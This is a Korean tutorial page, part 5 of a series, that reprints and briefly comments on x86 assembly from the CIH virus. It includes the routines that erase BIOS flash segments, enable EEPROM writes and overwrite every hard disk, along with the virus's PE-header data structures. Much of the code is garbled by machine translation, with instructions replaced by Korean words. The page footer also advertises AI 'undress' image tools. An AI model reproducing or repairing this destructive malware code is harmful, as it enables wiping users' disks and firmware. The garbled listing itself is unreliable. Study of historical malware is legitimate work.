바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]-PHP 튜토리얼-php.cn

집

백엔드 개발

PHP 튜토리얼

바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]

黄舟

Jan 17, 2017 am 11:21 AM

바이러스 프로그램 소스코드 예시 분석-CIH 바이러스[5]

push ecx
loop $

; BIOS에서 추가 000E0000 - 000E007F 세그먼트 ROM 데이터를 삭제합니다. 총 80시간 바이트입니다.
xor ah, ah
mov [eax], al
　
　xchg ecx, eax
　loop $
　
　; BIOS의 000E0000 - 000FFFFF 세그먼트 데이터를 표시하고 활성화합니다. 총 128KB입니다. 이 세그먼트는 mov eax, 0f5555h 정보를 쓸 수 있습니다.
Pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

000FE000 - 000FE07F 세그먼트 데이터 삭제; BIOS의 총 80h 바이트
mov ah, 0e0h
mov [eax], al

; BIOS의 000F0000 - 000FFFFF 섹션 숨기기, 총 64KB
mov word ptr ( BooleanCalculateCode-@10) [esi], 100ch
esi 호출

모든 하드 드라이브 삭제
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

루프를 파괴
LoopOfKillHardDisk:
int 20h
dd 00100004h
　
cmp word ptr [esi+06h], 0017h
je KillNextDataSection

;ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk
　
　;다음 영역 파괴
　KillNextDataSection:
　add dword ptr [esi+10h], ebx
　mov byte ptr [esi+4dh], FirstKillHardDiskNumber
　
jmp LoopOfKillHardDisk

EEPROM을 활성화하여 정보 쓰기
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax ], cl
mov [ecx], al

ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
al , 44h
　
xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
, al
　
　ret
　
　;정적 데이터 정의
　LastVxdCallAddress = IFSMgr_Ring0_FileIO;마지막 호출된 Vxd 명령어 주소
　VxdCallAddressTable DB 00h
　db IFSMgr_RemoveFileSystem ApiHook-_PageAllocate
　db UniToBCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;각 Vxd 호출 명령어의 주소 차이
xd의 호출 번호
VxdCallTable 크기 = ($-VxdCallIDTable)/04h ; 프로그램
　
;바이러스 버전 및 저작권 정보 정의
VirusVersionCopyright db 'CIH v';CIH 바이러스 식별
db MajorVirusVersion+'0';기본 버전 번호
에 사용된 Vxd 호출 횟수 db '.'
db MinorVirusVersion+'0' ; 마이너 버전 번호
db ' TATUNG' ; 바이러스 크기
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) + NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)

; 동적 데이터 정의
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; 바이러스 데이터 시작 주소

OnBusy db 0; "사용 중" 플래그
FileModificationTime dd ? DataBuffer
NumberOfSections dw ? 파일 시간
SymbolsPointer dd ? dd ? SizeOfOptionalHeader dw ? ;선택적 헤더의 길이
_Characteristics dw ? ;문자 집합 플래그
매직 dw ;플래그 단어(항상 010bh)
링커 버전 번호
SizeOfCode ?
SizeOfInitializedData dd ? 초기화되지 않은 데이터 블록 크기
BaseOfCode dd ;
　BaseOfData dd ? 데이터 섹션 시작 RVA
　ImageBase dd ? 기본 주소 로드 RVA
　
　@9 = $
　SectionAlignment dd ;FileAlignment dd ? alignment
　OperatingSystemVersion dd ? 필수 운영 체제 버전 번호
　ImageVersion dd ? 사용자 정의 버전 번호
　SubsystemVersion dd ? 필수 하위 시스템 버전 번호
　Reserved dd ? ; 파일의 각 부분의 총 길이
SizeOfHeaders dd ? 파일 헤더 크기
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
　
StartOfSectionTable=@9 > PointerToRawData = StartOfSectionTable+14h; 블록 물리적 오프셋
PointerToRelocations = StartOfSectionTable+18h; 재배치 오프셋
PointerToLineNumbers = StartOfSectionTable+1ch; 줄 번호 테이블 오프셋
NumberOfRelocations = StartOfSectionTable+20h; NumberOfLinenNmbers = StartOfSectionTable+22h ; 행 번호 테이블 수
Characteristics = StartOfSectionTable+24h ; 블록 속성
SizeOfScetionTable = Characteristics+04h-SectionName ; 메모리 양 바이러스에 필요함
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; END FileHeader
위의 코드 분석 과정을 통해 CIH 바이러스는 명확한 구조와 뚜렷한 계층을 가지고 있음을 알 수 있습니다. 이 바이러스 프로그램의 백본 구조는 바이러스의 세부 사항이 win95 방식에 따라 처리되고 모든 시스템 호출이 Vxd를 사용하여 이루어진다는 점을 제외하면 DOS 바이러스의 백본 구조와 매우 유사합니다. 이는 Windows에서 API 기능을 사용하는 것과 비교하여 바이러스 프로그램을 더 낮은 수준으로, 더 효율적으로 만들고, 인터럽트를 사용하는 것에 비해 바이러스 자체의 복잡한 재배치 프로세스를 고려할 필요가 없으며 더 잘 예방할 수 있습니다. 프로그램 추적.

CIH 바이러스에는 두 가지 혁신이 있습니다. 하나는 바이러스가 감염되면 감염된 파일의 블록 사이의 빈 공간을 찾아 그 안에 바이러스 고유의 다양한 데이터 구조와 코드를 쓰는 것입니다. 충분하지 않으며 전염성이 없으므로 일부 파일이 감염되지 않는 이유 중 하나입니다.) 둘째, 바이러스는 공격할 때 플래시 메모리를 태울 뿐만 아니라 하드 디스크를 파괴하여 컴퓨터 하드웨어를 손상시킬 수 있습니다.

보안상의 이유로 바이러스 공격을 유발하고 하드웨어를 손상시키는 코드 부분에 대한 자세한 분석을 제공하지 않았습니다.

위 내용은 바이러스 프로그램 소스코드 예제 분석-CIH 바이러스[5]의 내용이며, 더 많은 관련 내용은 PHP 중국어 홈페이지(www. php.cn)!

본 웹사이트의 성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?

7563

Cakephp 튜토리얼

1385

Steam의 계정 이름 형식은 무엇입니까?

Win11 활성화 키 영구

NYT 연결 힌트와 답변

Related knowledge

ALIPAY PHP SDK 전송 오류 : '클래스 부호 데이터를 선언 할 수 없음'의 문제를 해결하는 방법은 무엇입니까? Apr 01, 2025 am 07:21 AM

Alipay PHP ...

JWT (JSON Web Tokens) 및 PHP API의 사용 사례를 설명하십시오. Apr 05, 2025 am 12:04 AM

JWT는 주로 신분증 인증 및 정보 교환을 위해 당사자간에 정보를 안전하게 전송하는 데 사용되는 JSON을 기반으로 한 개방형 표준입니다. 1. JWT는 헤더, 페이로드 및 서명의 세 부분으로 구성됩니다. 2. JWT의 작업 원칙에는 세 가지 단계가 포함됩니다. JWT 생성, JWT 확인 및 Parsing Payload. 3. PHP에서 인증에 JWT를 사용하면 JWT를 생성하고 확인할 수 있으며 사용자 역할 및 권한 정보가 고급 사용에 포함될 수 있습니다. 4. 일반적인 오류에는 서명 검증 실패, 토큰 만료 및 대형 페이로드가 포함됩니다. 디버깅 기술에는 디버깅 도구 및 로깅 사용이 포함됩니다. 5. 성능 최적화 및 모범 사례에는 적절한 시그니처 알고리즘 사용, 타당성 기간 설정 합리적,

확실한 원칙과 PHP 개발에 적용되는 방법을 설명하십시오. Apr 03, 2025 am 12:04 AM

PHP 개발에서 견고한 원칙의 적용에는 다음이 포함됩니다. 1. 단일 책임 원칙 (SRP) : 각 클래스는 하나의 기능 만 담당합니다. 2. Open and Close Principle (OCP) : 변경은 수정보다는 확장을 통해 달성됩니다. 3. Lisch의 대체 원칙 (LSP) : 서브 클래스는 프로그램 정확도에 영향을 미치지 않고 기본 클래스를 대체 할 수 있습니다. 4. 인터페이스 격리 원리 (ISP) : 의존성 및 사용되지 않은 방법을 피하기 위해 세밀한 인터페이스를 사용하십시오. 5. 의존성 반전 원리 (DIP) : 높고 낮은 수준의 모듈은 추상화에 의존하며 종속성 주입을 통해 구현됩니다.